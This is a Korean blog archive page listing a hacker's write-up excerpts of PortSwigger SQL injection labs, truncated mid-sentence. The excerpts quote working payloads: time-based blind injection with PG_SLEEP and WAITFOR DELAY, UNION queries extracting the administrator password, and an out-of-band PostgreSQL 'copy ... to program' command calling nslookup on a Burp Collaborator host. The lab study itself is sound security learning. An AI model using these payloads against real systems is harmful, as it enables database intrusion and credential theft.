일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |
- 미국 금리인하
- 유튜버 김재석
- 불가피
- 성남은혜의강교회
- 김영권
- 금리인하
- 최강욱
- 김영권 아내
- 학교 개학 연기 4월
- 고민정
- 양적완화
- libtins
- 조희연
- 이지혜
- 성남 코로나 확진자
- 해킹
- 이상형 만들기
- 스콜피온킹
- 홍혜걸
- 임영규
- 은혜의 강 교회
- 제넥신
- 폰폰테스트
- 김재석
- 뭉쳐야 찬다
- 리리남매
- 킹덤 고근희
- 스페인 코로나
- 픽크루
- 이태원 클라쓰 15회 예고
- Today
- Total
목록2020/07 (20)
Dork's port
out-of-band 를 발생시키면 되는 문제. 즉, 다른곳으로 패킷이 날라가게끔 하면된다. cheat-sheet에 따르면, Oracle은 이미 패치가 되었고 (그러나 아직 이전 버전의 사용자가 많다고 서술하고 있다), MySQL에서는 windows에서만 가능하다고 한다. 우선 이전에 쭉 PostgreSQL을 사용하였으므로 먼저 테스트해보려고 copy (SELECT '') to program 'nslookup burpcollaborator.net' 을 테스트 해보았다. 내가 구축한 DB에서는 정상적으로 동작하지 않았는데 그 이유는 DB를 구동하는 Docker에 nslookup이 없기때문인 것 같다. 그래서 이제 SQL Injection에 동작하는 query를 만들어야하는데 병..
Time delay를 이용해서 admin의 비밀번호를 찾는 문제 이전 문제와 마찬가지로 x' or PG_SLEEP(10) IS NULL-- 이 동작하므로 이 Query를 기본으로 exploit을 진행하도록 하자. 그리고, 온라인에서 테스트가 한계가 있어 테스트 데이터 베이스를 구축하여 실습을 진행하였다 (쿼리에 대한 더욱 빠른 디버깅이 가능) . 위에서 언급한 Base Query의 문제점이 있는데, or을 이용할 경우 FROM 을 이용하여 특정 table의 내용을 검색하지 못하는 문제가 있다 (다른 방법이 있을 수도 있지만, 우선 내 지식의 한계 + 검색 귀찮음). 따라서, UNION SELECT 를 사용해야 하며, postgresql의 경우 column의 수 뿐만 아니라 return value의..
이번에는 Time delay 를 이용해서 blind injection을 하는 문제 마찬가지로 Cookie에 취약점이 존재 함 Jyo5LYnEFMw7YpXx' UNION SELECT SLEEP(10)-- 이 되지 않음. Jyo5LYnEFMw7YpXx' UNION SELECT PG_SLEEP(10)-- 도 되지 않음. Jyo5LYnEFMw7YpXx' UNION WAITFOR DELAY '0:0:10'-- 도 되지 않음 Jyo5LYnEFMw7YpXx' UNION dbms_pipe.receive_message(('a'),10)-- 도 되지 않음 음.. 데이터 베이스의 가능한 조건을 모두 해봤는데, 되지 않는거보니 다른 취약점이 있거나 무언가 잘못하고 있는..
이 문제는 웹 페이지에서 특정 문자로 condition을 확인하는 게 아닌 500 error 를 통해 확인하는 문제 ' UNION SELECT password FROM users where username='administrator'-- == True ' UNION SELECT password,'a' FROM users where username='administrator'-- == False 즉, False일땐 페이지가 정상적으로 로드되지 않는다. 따라서, condition에 따라 error를 return 하도록 해야하며, portswigger cheat sheet에서 찾을 수 있다. ' UNION SELECT if(1,'a'..